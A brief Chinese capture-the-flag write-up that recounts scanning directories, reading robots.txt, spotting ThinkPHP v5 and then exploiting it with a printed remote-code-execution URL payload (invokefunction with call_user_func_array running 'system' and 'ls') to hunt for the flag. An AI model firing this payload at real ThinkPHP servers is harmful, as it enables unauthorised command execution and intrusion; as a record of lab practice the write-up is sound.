后台目录扫描,robots.txt
thinkphpv5
网上搜thinkphp漏洞
/NSS/index.php/?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls
然后就正常的命令执行,(flag不在/flag,而是/nss里,真的难找)